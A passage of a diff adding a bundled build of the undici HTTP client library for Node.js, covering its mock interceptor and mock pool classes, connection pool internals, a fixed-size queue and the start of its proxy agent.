Defines the scope API for an interceptor reply + */ +class MockScope { + constructor (mockDispatch) { + this[kMockDispatch] = mockDispatch + } + + /** + * Delay a reply by a set amount in ms. + */ + delay (waitInMs) { + if (typeof waitInMs !== 'number' || !Number.isInteger(waitInMs) || waitInMs <= 0) { + throw new InvalidArgumentError('waitInMs must be a valid integer > 0') + } + + this[kMockDispatch].delay = waitInMs + return this + } + + /** + * For a defined reply, never mark as consumed. + */ + persist () { + this[kMockDispatch].persist = true + return this + } + + /** + * Allow one to define a reply for a set amount of matching requests. + */ + times (repeatTimes) { + if (typeof repeatTimes !== 'number' || !Number.isInteger(repeatTimes) || repeatTimes <= 0) { + throw new InvalidArgumentError('repeatTimes must be a valid integer > 0') + } + + this[kMockDispatch].times = repeatTimes + return this + } +} + +/** + * Defines an interceptor for a Mock + */ +class MockInterceptor { + constructor (opts, mockDispatches) { + if (typeof opts !== 'object') { + throw new InvalidArgumentError('opts must be an object') + } + if (typeof opts.path === 'undefined') { + throw new InvalidArgumentError('opts.path must be defined') + } + if (typeof opts.method === 'undefined') { + opts.method = 'GET' + } + // See https://github.com/nodejs/undici/issues/1245 + // As per RFC 3986, clients are not supposed to send URI + // fragments to servers when they retrieve a document, + if (typeof opts.path === 'string') { + if (opts.query) { + opts.path = buildURL(opts.path, opts.query) + } else { + // Matches https://github.com/nodejs/undici/blob/main/lib/fetch/index.js#L1811 + const parsedURL = new URL(opts.path, 'data://') + opts.path = parsedURL.pathname + parsedURL.search + } + } + if (typeof opts.method === 'string') { + opts.method = opts.method.toUpperCase() + } + + this[kDispatchKey] = buildKey(opts) + this[kDispatches] = mockDispatches + this[kDefaultHeaders] = {} + this[kDefaultTrailers] = {} + this[kContentLength] = false + } + + createMockScopeDispatchData (statusCode, data, responseOptions = {}) { + const responseData = getResponseData(data) + const contentLength = this[kContentLength] ? { 'content-length': responseData.length } : {} + const headers = { ...this[kDefaultHeaders], ...contentLength, ...responseOptions.headers } + const trailers = { ...this[kDefaultTrailers], ...responseOptions.trailers } + + return { statusCode, data, headers, trailers } + } + + validateReplyParameters (statusCode, data, responseOptions) { + if (typeof statusCode === 'undefined') { + throw new InvalidArgumentError('statusCode must be defined') + } + if (typeof data === 'undefined') { + throw new InvalidArgumentError('data must be defined') + } + if (typeof responseOptions !== 'object') { + throw new InvalidArgumentError('responseOptions must be an object') + } + } + + /** + * Mock an undici request with a defined reply. + */ + reply (replyData) { + // Values of reply aren't available right now as they + // can only be available when the reply callback is invoked. + if (typeof replyData === 'function') { + // We'll first wrap the provided callback in another function, + // this function will properly resolve the data from the callback + // when invoked. + const wrappedDefaultsCallback = (opts) => { + // Our reply options callback contains the parameter for statusCode, data and options. + const resolvedData = replyData(opts) + + // Check if it is in the right format + if (typeof resolvedData !== 'object') { + throw new InvalidArgumentError('reply options callback must return an object') + } + + const { statusCode, data = '', responseOptions = {} } = resolvedData + this.validateReplyParameters(statusCode, data, responseOptions) + // Since the values can be obtained immediately we return them + // from this higher order function that will be resolved later. + return { + ...this.createMockScopeDispatchData(statusCode, data, responseOptions) + } + } + + // Add usual dispatch data, but this time set the data parameter to function that will eventually provide data. + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], wrappedDefaultsCallback) + return new MockScope(newMockDispatch) + } + + // We can have either one or three parameters, if we get here, + // we should have 1-3 parameters. So we spread the arguments of + // this function to obtain the parameters, since replyData will always + // just be the statusCode. + const [statusCode, data = '', responseOptions = {}] = [...arguments] + this.validateReplyParameters(statusCode, data, responseOptions) + + // Send in-already provided data like usual + const dispatchData = this.createMockScopeDispatchData(statusCode, data, responseOptions) + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], dispatchData) + return new MockScope(newMockDispatch) + } + + /** + * Mock an undici request with a defined error. + */ + replyWithError (error) { + if (typeof error === 'undefined') { + throw new InvalidArgumentError('error must be defined') + } + + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], { error }) + return new MockScope(newMockDispatch) + } + + /** + * Set default reply headers on the interceptor for subsequent replies + */ + defaultReplyHeaders (headers) { + if (typeof headers === 'undefined') { + throw new InvalidArgumentError('headers must be defined') + } + + this[kDefaultHeaders] = headers + return this + } + + /** + * Set default reply trailers on the interceptor for subsequent replies + */ + defaultReplyTrailers (trailers) { + if (typeof trailers === 'undefined') { + throw new InvalidArgumentError('trailers must be defined') + } + + this[kDefaultTrailers] = trailers + return this + } + + /** + * Set reply content length header for replies on the interceptor + */ + replyContentLength () { + this[kContentLength] = true + return this + } +} + +module.exports.MockInterceptor = MockInterceptor +module.exports.MockScope = MockScope + + +/***/ }), + +/***/ 6193: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { promisify } = __nccwpck_require__(3837) +const Pool = __nccwpck_require__(4634) +const { buildMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kMockAgent, + kClose, + kOriginalClose, + kOrigin, + kOriginalDispatch, + kConnected +} = __nccwpck_require__(4347) +const { MockInterceptor } = __nccwpck_require__(410) +const Symbols = __nccwpck_require__(2785) +const { InvalidArgumentError } = __nccwpck_require__(8045) + +/** + * MockPool provides an API that extends the Pool to influence the mockDispatches. + */ +class MockPool extends Pool { + constructor (origin, opts) { + super(origin, opts) + + if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + + this[kMockAgent] = opts.agent + this[kOrigin] = origin + this[kDispatches] = [] + this[kConnected] = 1 + this[kOriginalDispatch] = this.dispatch + this[kOriginalClose] = this.close.bind(this) + + this.dispatch = buildMockDispatch.call(this) + this.close = this[kClose] + } + + get [Symbols.kConnected] () { + return this[kConnected] + } + + /** + * Sets up the base interceptor for mocking replies from undici. + */ + intercept (opts) { + return new MockInterceptor(opts, this[kDispatches]) + } + + async [kClose] () { + await promisify(this[kOriginalClose])() + this[kConnected] = 0 + this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) + } +} + +module.exports = MockPool + + +/***/ }), + +/***/ 4347: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kAgent: Symbol('agent'), + kOptions: Symbol('options'), + kFactory: Symbol('factory'), + kDispatches: Symbol('dispatches'), + kDispatchKey: Symbol('dispatch key'), + kDefaultHeaders: Symbol('default headers'), + kDefaultTrailers: Symbol('default trailers'), + kContentLength: Symbol('content length'), + kMockAgent: Symbol('mock agent'), + kMockAgentSet: Symbol('mock agent set'), + kMockAgentGet: Symbol('mock agent get'), + kMockDispatch: Symbol('mock dispatch'), + kClose: Symbol('close'), + kOriginalClose: Symbol('original agent close'), + kOrigin: Symbol('origin'), + kIsMockActive: Symbol('is mock active'), + kNetConnect: Symbol('net connect'), + kGetNetConnect: Symbol('get net connect'), + kConnected: Symbol('connected') +} + + +/***/ }), + +/***/ 9323: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { MockNotMatchedError } = __nccwpck_require__(888) +const { + kDispatches, + kMockAgent, + kOriginalDispatch, + kOrigin, + kGetNetConnect +} = __nccwpck_require__(4347) +const { buildURL, nop } = __nccwpck_require__(3983) +const { STATUS_CODES } = __nccwpck_require__(3685) +const { + types: { + isPromise + } +} = __nccwpck_require__(3837) + +function matchValue (match, value) { + if (typeof match === 'string') { + return match === value + } + if (match instanceof RegExp) { + return match.test(value) + } + if (typeof match === 'function') { + return match(value) === true + } + return false +} + +function lowerCaseEntries (headers) { + return Object.fromEntries( + Object.entries(headers).map(([headerName, headerValue]) => { + return [headerName.toLocaleLowerCase(), headerValue] + }) + ) +} + +/** + * @param {import('../../index').Headers|string[]|Record} headers + * @param {string} key + */ +function getHeaderByName (headers, key) { + if (Array.isArray(headers)) { + for (let i = 0; i < headers.length; i += 2) { + if (headers[i].toLocaleLowerCase() === key.toLocaleLowerCase()) { + return headers[i + 1] + } + } + + return undefined + } else if (typeof headers.get === 'function') { + return headers.get(key) + } else { + return lowerCaseEntries(headers)[key.toLocaleLowerCase()] + } +} + +/** @param {string[]} headers */ +function buildHeadersFromArray (headers) { // fetch HeadersList + const clone = headers.slice() + const entries = [] + for (let index = 0; index < clone.length; index += 2) { + entries.push([clone[index], clone[index + 1]]) + } + return Object.fromEntries(entries) +} + +function matchHeaders (mockDispatch, headers) { + if (typeof mockDispatch.headers === 'function') { + if (Array.isArray(headers)) { // fetch HeadersList + headers = buildHeadersFromArray(headers) + } + return mockDispatch.headers(headers ? lowerCaseEntries(headers) : {}) + } + if (typeof mockDispatch.headers === 'undefined') { + return true + } + if (typeof headers !== 'object' || typeof mockDispatch.headers !== 'object') { + return false + } + + for (const [matchHeaderName, matchHeaderValue] of Object.entries(mockDispatch.headers)) { + const headerValue = getHeaderByName(headers, matchHeaderName) + + if (!matchValue(matchHeaderValue, headerValue)) { + return false + } + } + return true +} + +function safeUrl (path) { + if (typeof path !== 'string') { + return path + } + + const pathSegments = path.split('?') + + if (pathSegments.length !== 2) { + return path + } + + const qp = new URLSearchParams(pathSegments.pop()) + qp.sort() + return [...pathSegments, qp.toString()].join('?') +} + +function matchKey (mockDispatch, { path, method, body, headers }) { + const pathMatch = matchValue(mockDispatch.path, path) + const methodMatch = matchValue(mockDispatch.method, method) + const bodyMatch = typeof mockDispatch.body !== 'undefined' ? matchValue(mockDispatch.body, body) : true + const headersMatch = matchHeaders(mockDispatch, headers) + return pathMatch && methodMatch && bodyMatch && headersMatch +} + +function getResponseData (data) { + if (Buffer.isBuffer(data)) { + return data + } else if (typeof data === 'object') { + return JSON.stringify(data) + } else { + return data.toString() + } +} + +function getMockDispatch (mockDispatches, key) { + const basePath = key.query ? buildURL(key.path, key.query) : key.path + const resolvedPath = typeof basePath === 'string' ? safeUrl(basePath) : basePath + + // Match path + let matchedMockDispatches = mockDispatches.filter(({ consumed }) => !consumed).filter(({ path }) => matchValue(safeUrl(path), resolvedPath)) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for path '${resolvedPath}'`) + } + + // Match method + matchedMockDispatches = matchedMockDispatches.filter(({ method }) => matchValue(method, key.method)) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for method '${key.method}'`) + } + + // Match body + matchedMockDispatches = matchedMockDispatches.filter(({ body }) => typeof body !== 'undefined' ? matchValue(body, key.body) : true) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for body '${key.body}'`) + } + + // Match headers + matchedMockDispatches = matchedMockDispatches.filter((mockDispatch) => matchHeaders(mockDispatch, key.headers)) + if (matchedMockDispatches.length === 0) { + throw new MockNotMatchedError(`Mock dispatch not matched for headers '${typeof key.headers === 'object' ? JSON.stringify(key.headers) : key.headers}'`) + } + + return matchedMockDispatches[0] +} + +function addMockDispatch (mockDispatches, key, data) { + const baseData = { timesInvoked: 0, times: 1, persist: false, consumed: false } + const replyData = typeof data === 'function' ? { callback: data } : { ...data } + const newMockDispatch = { ...baseData, ...key, pending: true, data: { error: null, ...replyData } } + mockDispatches.push(newMockDispatch) + return newMockDispatch +} + +function deleteMockDispatch (mockDispatches, key) { + const index = mockDispatches.findIndex(dispatch => { + if (!dispatch.consumed) { + return false + } + return matchKey(dispatch, key) + }) + if (index !== -1) { + mockDispatches.splice(index, 1) + } +} + +function buildKey (opts) { + const { path, method, body, headers, query } = opts + return { + path, + method, + body, + headers, + query + } +} + +function generateKeyValues (data) { + return Object.entries(data).reduce((keyValuePairs, [key, value]) => [ + ...keyValuePairs, + Buffer.from(`${key}`), + Array.isArray(value) ? value.map(x => Buffer.from(`${x}`)) : Buffer.from(`${value}`) + ], []) +} + +/** + * @see https://developer.mozilla.org/en-US/docs/Web/HTTP/Status + * @param {number} statusCode + */ +function getStatusText (statusCode) { + return STATUS_CODES[statusCode] || 'unknown' +} + +async function getResponse (body) { + const buffers = [] + for await (const data of body) { + buffers.push(data) + } + return Buffer.concat(buffers).toString('utf8') +} + +/** + * Mock dispatch function used to simulate undici dispatches + */ +function mockDispatch (opts, handler) { + // Get mock dispatch from built key + const key = buildKey(opts) + const mockDispatch = getMockDispatch(this[kDispatches], key) + + mockDispatch.timesInvoked++ + + // Here's where we resolve a callback if a callback is present for the dispatch data. + if (mockDispatch.data.callback) { + mockDispatch.data = { ...mockDispatch.data, ...mockDispatch.data.callback(opts) } + } + + // Parse mockDispatch data + const { data: { statusCode, data, headers, trailers, error }, delay, persist } = mockDispatch + const { timesInvoked, times } = mockDispatch + + // If it's used up and not persistent, mark as consumed + mockDispatch.consumed = !persist && timesInvoked >= times + mockDispatch.pending = timesInvoked < times + + // If specified, trigger dispatch error + if (error !== null) { + deleteMockDispatch(this[kDispatches], key) + handler.onError(error) + return true + } + + // Handle the request with a delay if necessary + if (typeof delay === 'number' && delay > 0) { + setTimeout(() => { + handleReply(this[kDispatches]) + }, delay) + } else { + handleReply(this[kDispatches]) + } + + function handleReply (mockDispatches, _data = data) { + // fetch's HeadersList is a 1D string array + const optsHeaders = Array.isArray(opts.headers) + ? buildHeadersFromArray(opts.headers) + : opts.headers + const body = typeof _data === 'function' + ? _data({ ...opts, headers: optsHeaders }) + : _data + + // util.types.isPromise is likely needed for jest. + if (isPromise(body)) { + // If handleReply is asynchronous, throwing an error + // in the callback will reject the promise, rather than + // synchronously throw the error, which breaks some tests. + // Rather, we wait for the callback to resolve if it is a + // promise, and then re-run handleReply with the new body. + body.then((newData) => handleReply(mockDispatches, newData)) + return + } + + const responseData = getResponseData(body) + const responseHeaders = generateKeyValues(headers) + const responseTrailers = generateKeyValues(trailers) + + handler.abort = nop + handler.onHeaders(statusCode, responseHeaders, resume, getStatusText(statusCode)) + handler.onData(Buffer.from(responseData)) + handler.onComplete(responseTrailers) + deleteMockDispatch(mockDispatches, key) + } + + function resume () {} + + return true +} + +function buildMockDispatch () { + const agent = this[kMockAgent] + const origin = this[kOrigin] + const originalDispatch = this[kOriginalDispatch] + + return function dispatch (opts, handler) { + if (agent.isMockActive) { + try { + mockDispatch.call(this, opts, handler) + } catch (error) { + if (error instanceof MockNotMatchedError) { + const netConnect = agent[kGetNetConnect]() + if (netConnect === false) { + throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect disabled)`) + } + if (checkNetConnect(netConnect, origin)) { + originalDispatch.call(this, opts, handler) + } else { + throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect is not enabled for this origin)`) + } + } else { + throw error + } + } + } else { + originalDispatch.call(this, opts, handler) + } + } +} + +function checkNetConnect (netConnect, origin) { + const url = new URL(origin) + if (netConnect === true) { + return true + } else if (Array.isArray(netConnect) && netConnect.some((matcher) => matchValue(matcher, url.host))) { + return true + } + return false +} + +function buildMockOptions (opts) { + if (opts) { + const { agent, ...mockOptions } = opts + return mockOptions + } +} + +module.exports = { + getResponseData, + getMockDispatch, + addMockDispatch, + deleteMockDispatch, + buildKey, + generateKeyValues, + matchValue, + getResponse, + getStatusText, + mockDispatch, + buildMockDispatch, + checkNetConnect, + buildMockOptions, + getHeaderByName +} + + +/***/ }), + +/***/ 6823: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Transform } = __nccwpck_require__(2781) +const { Console } = __nccwpck_require__(6206) + +/** + * Gets the output of `console.table(…)` as a string. + */ +module.exports = class PendingInterceptorsFormatter { + constructor ({ disableColors } = {}) { + this.transform = new Transform({ + transform (chunk, _enc, cb) { + cb(null, chunk) + } + }) + + this.logger = new Console({ + stdout: this.transform, + inspectOptions: { + colors: !disableColors && !process.env.CI + } + }) + } + + format (pendingInterceptors) { + const withPrettyHeaders = pendingInterceptors.map( + ({ method, path, data: { statusCode }, persist, times, timesInvoked, origin }) => ({ + Method: method, + Origin: origin, + Path: path, + 'Status code': statusCode, + Persistent: persist ? '✅' : 'âŒ', + Invocations: timesInvoked, + Remaining: persist ? Infinity : times - timesInvoked + })) + + this.logger.table(withPrettyHeaders) + return this.transform.read().toString() + } +} + + +/***/ }), + +/***/ 8891: +/***/ ((module) => { + +"use strict"; + + +const singulars = { + pronoun: 'it', + is: 'is', + was: 'was', + this: 'this' +} + +const plurals = { + pronoun: 'they', + is: 'are', + was: 'were', + this: 'these' +} + +module.exports = class Pluralizer { + constructor (singular, plural) { + this.singular = singular + this.plural = plural + } + + pluralize (count) { + const one = count === 1 + const keys = one ? singulars : plurals + const noun = one ? this.singular : this.plural + return { ...keys, count, noun } + } +} + + +/***/ }), + +/***/ 8266: +/***/ ((module) => { + +"use strict"; +/* eslint-disable */ + + + +// Extracted from node/lib/internal/fixed_queue.js + +// Currently optimal queue size, tested on V8 6.0 - 6.6. Must be power of two. +const kSize = 2048; +const kMask = kSize - 1; + +// The FixedQueue is implemented as a singly-linked list of fixed-size +// circular buffers. It looks something like this: +// +// head tail +// | | +// v v +// +-----------+ <-----\ +-----------+ <------\ +-----------+ +// | [null] | \----- | next | \------- | next | +// +-----------+ +-----------+ +-----------+ +// | item | <-- bottom | item | <-- bottom | [empty] | +// | item | | item | | [empty] | +// | item | | item | | [empty] | +// | item | | item | | [empty] | +// | item | | item | bottom --> | item | +// | item | | item | | item | +// | ... | | ... | | ... | +// | item | | item | | item | +// | item | | item | | item | +// | [empty] | <-- top | item | | item | +// | [empty] | | item | | item | +// | [empty] | | [empty] | <-- top top --> | [empty] | +// +-----------+ +-----------+ +-----------+ +// +// Or, if there is only one circular buffer, it looks something +// like either of these: +// +// head tail head tail +// | | | | +// v v v v +// +-----------+ +-----------+ +// | [null] | | [null] | +// +-----------+ +-----------+ +// | [empty] | | item | +// | [empty] | | item | +// | item | <-- bottom top --> | [empty] | +// | item | | [empty] | +// | [empty] | <-- top bottom --> | item | +// | [empty] | | item | +// +-----------+ +-----------+ +// +// Adding a value means moving `top` forward by one, removing means +// moving `bottom` forward by one. After reaching the end, the queue +// wraps around. +// +// When `top === bottom` the current queue is empty and when +// `top + 1 === bottom` it's full. This wastes a single space of storage +// but allows much quicker checks. + +class FixedCircularBuffer { + constructor() { + this.bottom = 0; + this.top = 0; + this.list = new Array(kSize); + this.next = null; + } + + isEmpty() { + return this.top === this.bottom; + } + + isFull() { + return ((this.top + 1) & kMask) === this.bottom; + } + + push(data) { + this.list[this.top] = data; + this.top = (this.top + 1) & kMask; + } + + shift() { + const nextItem = this.list[this.bottom]; + if (nextItem === undefined) + return null; + this.list[this.bottom] = undefined; + this.bottom = (this.bottom + 1) & kMask; + return nextItem; + } +} + +module.exports = class FixedQueue { + constructor() { + this.head = this.tail = new FixedCircularBuffer(); + } + + isEmpty() { + return this.head.isEmpty(); + } + + push(data) { + if (this.head.isFull()) { + // Head is full: Creates a new queue, sets the old queue's `.next` to it, + // and sets it as the new main queue. + this.head = this.head.next = new FixedCircularBuffer(); + } + this.head.push(data); + } + + shift() { + const tail = this.tail; + const next = tail.shift(); + if (tail.isEmpty() && tail.next !== null) { + // If there is another queue, it forms the new tail. + this.tail = tail.next; + } + return next; + } +}; + + +/***/ }), + +/***/ 3198: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const DispatcherBase = __nccwpck_require__(4839) +const FixedQueue = __nccwpck_require__(8266) +const { kConnected, kSize, kRunning, kPending, kQueued, kBusy, kFree, kUrl, kClose, kDestroy, kDispatch } = __nccwpck_require__(2785) +const PoolStats = __nccwpck_require__(9689) + +const kClients = Symbol('clients') +const kNeedDrain = Symbol('needDrain') +const kQueue = Symbol('queue') +const kClosedResolve = Symbol('closed resolve') +const kOnDrain = Symbol('onDrain') +const kOnConnect = Symbol('onConnect') +const kOnDisconnect = Symbol('onDisconnect') +const kOnConnectionError = Symbol('onConnectionError') +const kGetDispatcher = Symbol('get dispatcher') +const kAddClient = Symbol('add client') +const kRemoveClient = Symbol('remove client') +const kStats = Symbol('stats') + +class PoolBase extends DispatcherBase { + constructor () { + super() + + this[kQueue] = new FixedQueue() + this[kClients] = [] + this[kQueued] = 0 + + const pool = this + + this[kOnDrain] = function onDrain (origin, targets) { + const queue = pool[kQueue] + + let needDrain = false + + while (!needDrain) { + const item = queue.shift() + if (!item) { + break + } + pool[kQueued]-- + needDrain = !this.dispatch(item.opts, item.handler) + } + + this[kNeedDrain] = needDrain + + if (!this[kNeedDrain] && pool[kNeedDrain]) { + pool[kNeedDrain] = false + pool.emit('drain', origin, [pool, ...targets]) + } + + if (pool[kClosedResolve] && queue.isEmpty()) { + Promise + .all(pool[kClients].map(c => c.close())) + .then(pool[kClosedResolve]) + } + } + + this[kOnConnect] = (origin, targets) => { + pool.emit('connect', origin, [pool, ...targets]) + } + + this[kOnDisconnect] = (origin, targets, err) => { + pool.emit('disconnect', origin, [pool, ...targets], err) + } + + this[kOnConnectionError] = (origin, targets, err) => { + pool.emit('connectionError', origin, [pool, ...targets], err) + } + + this[kStats] = new PoolStats(this) + } + + get [kBusy] () { + return this[kNeedDrain] + } + + get [kConnected] () { + return this[kClients].filter(client => client[kConnected]).length + } + + get [kFree] () { + return this[kClients].filter(client => client[kConnected] && !client[kNeedDrain]).length + } + + get [kPending] () { + let ret = this[kQueued] + for (const { [kPending]: pending } of this[kClients]) { + ret += pending + } + return ret + } + + get [kRunning] () { + let ret = 0 + for (const { [kRunning]: running } of this[kClients]) { + ret += running + } + return ret + } + + get [kSize] () { + let ret = this[kQueued] + for (const { [kSize]: size } of this[kClients]) { + ret += size + } + return ret + } + + get stats () { + return this[kStats] + } + + async [kClose] () { + if (this[kQueue].isEmpty()) { + return Promise.all(this[kClients].map(c => c.close())) + } else { + return new Promise((resolve) => { + this[kClosedResolve] = resolve + }) + } + } + + async [kDestroy] (err) { + while (true) { + const item = this[kQueue].shift() + if (!item) { + break + } + item.handler.onError(err) + } + + return Promise.all(this[kClients].map(c => c.destroy(err))) + } + + [kDispatch] (opts, handler) { + const dispatcher = this[kGetDispatcher]() + + if (!dispatcher) { + this[kNeedDrain] = true + this[kQueue].push({ opts, handler }) + this[kQueued]++ + } else if (!dispatcher.dispatch(opts, handler)) { + dispatcher[kNeedDrain] = true + this[kNeedDrain] = !this[kGetDispatcher]() + } + + return !this[kNeedDrain] + } + + [kAddClient] (client) { + client + .on('drain', this[kOnDrain]) + .on('connect', this[kOnConnect]) + .on('disconnect', this[kOnDisconnect]) + .on('connectionError', this[kOnConnectionError]) + + this[kClients].push(client) + + if (this[kNeedDrain]) { + process.nextTick(() => { + if (this[kNeedDrain]) { + this[kOnDrain](client[kUrl], [this, client]) + } + }) + } + + return this + } + + [kRemoveClient] (client) { + client.close(() => { + const idx = this[kClients].indexOf(client) + if (idx !== -1) { + this[kClients].splice(idx, 1) + } + }) + + this[kNeedDrain] = this[kClients].some(dispatcher => ( + !dispatcher[kNeedDrain] && + dispatcher.closed !== true && + dispatcher.destroyed !== true + )) + } +} + +module.exports = { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kRemoveClient, + kGetDispatcher +} + + +/***/ }), + +/***/ 9689: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const { kFree, kConnected, kPending, kQueued, kRunning, kSize } = __nccwpck_require__(2785) +const kPool = Symbol('pool') + +class PoolStats { + constructor (pool) { + this[kPool] = pool + } + + get connected () { + return this[kPool][kConnected] + } + + get free () { + return this[kPool][kFree] + } + + get pending () { + return this[kPool][kPending] + } + + get queued () { + return this[kPool][kQueued] + } + + get running () { + return this[kPool][kRunning] + } + + get size () { + return this[kPool][kSize] + } +} + +module.exports = PoolStats + + +/***/ }), + +/***/ 4634: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kGetDispatcher +} = __nccwpck_require__(3198) +const Client = __nccwpck_require__(3598) +const { + InvalidArgumentError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { kUrl, kInterceptors } = __nccwpck_require__(2785) +const buildConnector = __nccwpck_require__(2067) + +const kOptions = Symbol('options') +const kConnections = Symbol('connections') +const kFactory = Symbol('factory') + +function defaultFactory (origin, opts) { + return new Client(origin, opts) +} + +class Pool extends PoolBase { + constructor (origin, { + connections, + factory = defaultFactory, + connect, + connectTimeout, + tls, + maxCachedSessions, + socketPath, + autoSelectFamily, + autoSelectFamilyAttemptTimeout, + allowH2, + ...options + } = {}) { + super() + + if (connections != null && (!Number.isFinite(connections) || connections < 0)) { + throw new InvalidArgumentError('invalid connections') + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (typeof connect !== 'function') { + connect = buildConnector({ + ...tls, + maxCachedSessions, + allowH2, + socketPath, + timeout: connectTimeout, + ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), + ...connect + }) + } + + this[kInterceptors] = options.interceptors && options.interceptors.Pool && Array.isArray(options.interceptors.Pool) + ? options.interceptors.Pool + : [] + this[kConnections] = connections || null + this[kUrl] = util.parseOrigin(origin) + this[kOptions] = { ...util.deepClone(options), connect, allowH2 } + this[kOptions].interceptors = options.interceptors + ? { ...options.interceptors } + : undefined + this[kFactory] = factory + } + + [kGetDispatcher] () { + let dispatcher = this[kClients].find(dispatcher => !dispatcher[kNeedDrain]) + + if (dispatcher) { + return dispatcher + } + + if (!this[kConnections] || this[kClients].length < this[kConnections]) { + dispatcher = this[kFactory](this[kUrl], this[kOptions]) + this[kAddClient](dispatcher) + } + + return dispatcher + } +} + +module.exports = Pool + + +/***/ }), + +/***/ 7858: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kProxy, kClose, kDestroy, kInterceptors } = __nccwpck_require__(2785) +const { URL } = __nccwpck_require__(7310) +const Agent = __nccwpck_require__(7890) +const Pool = __nccwpck_require__(4634) +const DispatcherBase = __nccwpck_require__(4839) +const { InvalidArgumentError, RequestAbortedError } = __nccwpck_require__(8045) +const buildConnector = __nccwpck_require__(2067) + +const kAgent = Symbol('proxy agent') +const kClient = Symbol('proxy client') +const kProxyHeaders = Symbol('proxy headers') +const kRequestTls = Symbol('request tls settings') +const kProxyTls = Symbol('proxy tls settings') +const kConnectEndpoint = Symbol('connect endpoint function') + +function defaultProtocolPort (protocol) { + return protocol === 'https:' ? 443 : 80 +} + +function buildProxyOptions (opts) { + if (typeof opts === 'string') { + opts = { uri: opts } + } + + if (!opts || !opts.uri) { + throw new InvalidArgumentError('Proxy opts.uri is mandatory') + } + + return { + uri: opts.uri, + protocol: opts.protocol || 'https' + } +} + +function defaultFactory (origin, opts) { + return new Pool(origin, opts) +} + +class ProxyAgent extends DispatcherBase { + constructor (opts) { + super(opts) + this[kProxy] = buildProxyOptions(opts) + this[kAgent] = new Agent(opts) + this[kInterceptors] = opts.interceptors && opts.interceptors.ProxyAgent && Array.isArray(opts.interceptors.ProxyAgent) + ? opts.interceptors.ProxyAgent + : [] + + if (typeof opts === 'string') { + opts = { uri: opts } + } + + if (!opts || !opts.uri) { + throw new InvalidArgumentError('Proxy opts.uri is mandatory') + } + + const { clientFactory = defaultFactory } = opts + + if (typeof clientFactory !== 'function') { + throw new InvalidArgumentError('Proxy opts.clientFactory must be a function.') + } + + this[kRequestTls] = opts.requestTls + this[kProxyTls] = opts.proxyTls + this[kProxyHeaders] = opts.headers || {} + + const resolvedUrl = new URL(opts.uri) + const { origin, port, host, username, password } = resolvedUrl + + if (opts.auth && opts.token) { + throw new InvalidArgumentError('opts.auth cannot be used in combination with opts.token') + } else if (opts.auth) { + /* @deprecated in favour of opts.token */ + this[kProxyHeaders]['proxy-authorization'] = `Basic ${opts.auth}` + } else if (opts.token) { + this[kProxyHeaders]['proxy-authorization'] = opts.token + } else if (username && password) { + this[kProxyHeaders]['proxy-authorization'] = `Basic ${Buffer.from(`${decodeURIComponent(username)}:${decodeURIComponent(password)}`).toString('base64')}` + } + + const connect = buildConnector({ ...opts.proxyTls }) + this[kConnectEndpoint] = buildConnector({ ...opts.requestTls }) + this[kClient] = clientFactory(resolvedUrl, { connect }) + this[kAgent] = new Agent({ + ...opts, + connect: async (opts, callback) => { + let requestedHost = opts.host + if (!opts.port) { + requestedHost += `:${defaultProtocolPort(opts.protocol)}` + } + try { + const { socket, statusCode } = await this[kClient].connect({ + origin, + port, + path: requestedHost, + signal: opts.signal, + headers: { + ...this[kProxyHeaders], + host + } + }) + if (statusCode !== 200) { + socket.on('error', () => {}).destroy() + callback(new RequestAbortedError(`Proxy response (${statusCode}) !== 200 when HTTP Tunneling`)) + } + if (opts.protocol !== 'https:') { + callback(null, socket) + return + } + let servername + if (this[kRequestTls]) { + servername = this[kRequestTls].servername + } else { + servername = opts.servername + } + this[kConnectEndpoint]({ ...opts, servername, httpSocket: socket }, callback) + } catch (err) { + callback(err) + } + } + }) + } + + dispatch (opts, handler) { + const { host } = new URL(opts.origin) + const headers = buildHeaders(opts.headers) + throwIfProxyAuthIsSent(headers) + return this[kAgent].dispatch( + { + ...opts, + headers: { + ...headers, + host + } + }, + handler + ) + } + + async [kClose] () { + await this[kAgent].close() + await this[kClient].close() + } + + async [kDestroy] () { + await this[kAgent].destroy() + await this[kClient].destroy() + } +} + +/** + * @param {string[] | Record} headers + * @returns {Record} + */ +function buildHeaders (headers) { + // When using undici.fetch, the headers list is stored + // as an array. + if (Array.isArray(headers)) { + /** @type {Record} */ + const headersPair = {} + + for (let i = 0; i < headers.length; i += 2) { + headersPair[headers[i]] = headers[i + 1] + } + + return headersPair + } + + return headers +} + +/** + * @param {Record} headers + * + * Previous versions of ProxyAgent suggests the Proxy-Authorization in request headers + * Nevertheless, it was changed and to avoid a security vulnerability by end users + * this check was created. + * It should be 